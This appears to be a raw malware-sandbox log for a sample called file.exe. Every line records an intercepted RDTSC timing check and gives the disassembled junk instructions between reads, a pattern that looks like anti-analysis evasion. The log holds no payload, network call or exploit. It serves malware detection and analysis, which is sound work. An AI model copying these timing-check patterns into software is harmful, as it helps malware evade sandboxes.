Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B83A6 second address: 4B83B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 jne 00007F2DFC4C710Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45858C second address: 458592 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458592 second address: 4585AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2DFC4C7116h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4585AC second address: 4585B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4585B0 second address: 4585F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2788h], ebx 0x00000011 push 00000004h 0x00000013 jmp 00007F2DFC4C7112h 0x00000018 mov dword ptr [ebp+122D27B8h], edi 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2DFC4C7114h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4585F4 second address: 458608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7160h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B864D second address: 4B866D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2DFC4C7114h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B866D second address: 4B8673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8673 second address: 4B8677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8677 second address: 4B86A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2DFCDF715Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2DFCDF7169h 0x00000013 jnc 00007F2DFCDF7156h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B86A8 second address: 4B86AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B86AE second address: 4B86CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F2DFCDF7156h 0x0000000e jmp 00007F2DFCDF7163h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BF2F3 second address: 4BF2FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BF2FC second address: 4BF304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BF304 second address: 4BF30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BF30C second address: 4BF312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BFB10 second address: 4BFB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C00F8 second address: 4C0126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2DFCDF7160h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jnp 00007F2DFCDF7156h 0x00000012 jbe 00007F2DFCDF7156h 0x00000018 pop ebx 0x00000019 jns 00007F2DFCDF715Eh 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C0126 second address: 4C013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F2DFC4C710Eh 0x0000000d jno 00007F2DFC4C7106h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C0405 second address: 4C040A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C040A second address: 4C0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F2DFC4C7113h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C0423 second address: 4C042D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2DFCDF7156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5756 second address: 4C575A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C48D2 second address: 4C48D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C48D7 second address: 4C48E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F2DFC4C7106h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C48E3 second address: 4C48E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4B41 second address: 4C4B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2DFC4C7106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4CE8 second address: 4C4CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4CF6 second address: 4C4CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4CFA second address: 4C4D18 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2DFCDF7156h 0x00000008 jmp 00007F2DFCDF7160h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4D18 second address: 4C4D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4D1E second address: 4C4D42 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2DFCDF7156h 0x00000008 jmp 00007F2DFCDF7160h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007F2DFCDF715Eh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5114 second address: 4C5134 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F2DFC4C7116h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C53D5 second address: 4C53DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C53DB second address: 4C53E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C53E1 second address: 4C53E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C53E8 second address: 4C53F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2DFC4C7106h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1B5A second address: 4D1B64 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2DFCDF715Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1B64 second address: 4D1B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1B6E second address: 4D1B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CFEF2 second address: 4CFEF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CFEF8 second address: 4CFF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 je 00007F2DFCDF715Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D0302 second address: 4D032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2DFC4C7113h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jp 00007F2DFC4C7108h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D0614 second address: 4D061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D0788 second address: 4D078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1339 second address: 4D133D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D19F6 second address: 4D1A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2DFC4C7106h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007F2DFC4C7119h 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1A21 second address: 4D1A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1A26 second address: 4D1A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF900 second address: 4CF919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2DFCDF715Ah 0x00000009 popad 0x0000000a jc 00007F2DFCDF715Ah 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4310 second address: 4D432D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C7114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D432D second address: 4D434B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2DFCDF7169h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D434B second address: 4D4366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2DFC4C7115h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4366 second address: 4D437F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF715Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jne 00007F2DFCDF7156h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA759 second address: 4DA760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA760 second address: 4DA77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2DFCDF7168h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA77C second address: 4DA780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDA3D second address: 4EDA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDA43 second address: 4EDA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDA47 second address: 4EDA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDA4D second address: 4EDA59 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2DFC4C710Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F2939 second address: 4F2947 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F2DFCDF7158h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F2947 second address: 4F294D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F294D second address: 4F2953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F2953 second address: 4F2961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2DFC4C710Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9A0F second address: 4F9A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9A13 second address: 4F9A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2DFC4C710Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnc 00007F2DFC4C7106h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9A2A second address: 4F9A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9A30 second address: 4F9A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2DFC4C7106h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9A41 second address: 4F9A51 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2DFCDF7156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9A51 second address: 4F9A60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007F2DFC4C7106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC7C5 second address: 4FC7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2DFCDF7156h 0x0000000a jmp 00007F2DFCDF7168h 0x0000000f popad 0x00000010 ja 00007F2DFCDF715Eh 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC7FC second address: 4FC800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC800 second address: 4FC855 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2DFCDF7156h 0x00000008 jmp 00007F2DFCDF7163h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F2DFCDF7167h 0x00000017 jmp 00007F2DFCDF7163h 0x0000001c popad 0x0000001d jc 00007F2DFCDF715Eh 0x00000023 push eax 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC855 second address: 4FC85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC85C second address: 4FC862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC64B second address: 4FC662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2DFC4C710Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5054AA second address: 5054B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F2DFCDF7156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5054B6 second address: 5054D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C710Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5054D4 second address: 5054F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5054F1 second address: 505515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C710Fh 0x00000007 pushad 0x00000008 jmp 00007F2DFC4C7110h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505633 second address: 50563F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50594A second address: 505964 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2DFC4C710Ch 0x00000008 jnc 00007F2DFC4C7106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007F2DFC4C7126h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505964 second address: 50596E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2DFCDF7156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50596E second address: 505978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505AD5 second address: 505ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505ADB second address: 505AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2DFC4C7118h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505C72 second address: 505C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505C78 second address: 505C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505C7E second address: 505C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505C84 second address: 505C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 506755 second address: 50676D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 ja 00007F2DFCDF7177h 0x0000000d pushad 0x0000000e jne 00007F2DFCDF7156h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50676D second address: 506773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5093E2 second address: 5093E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5093E8 second address: 509406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F2DFC4C7112h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50ADB4 second address: 50ADC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF715Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50ADC6 second address: 50ADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
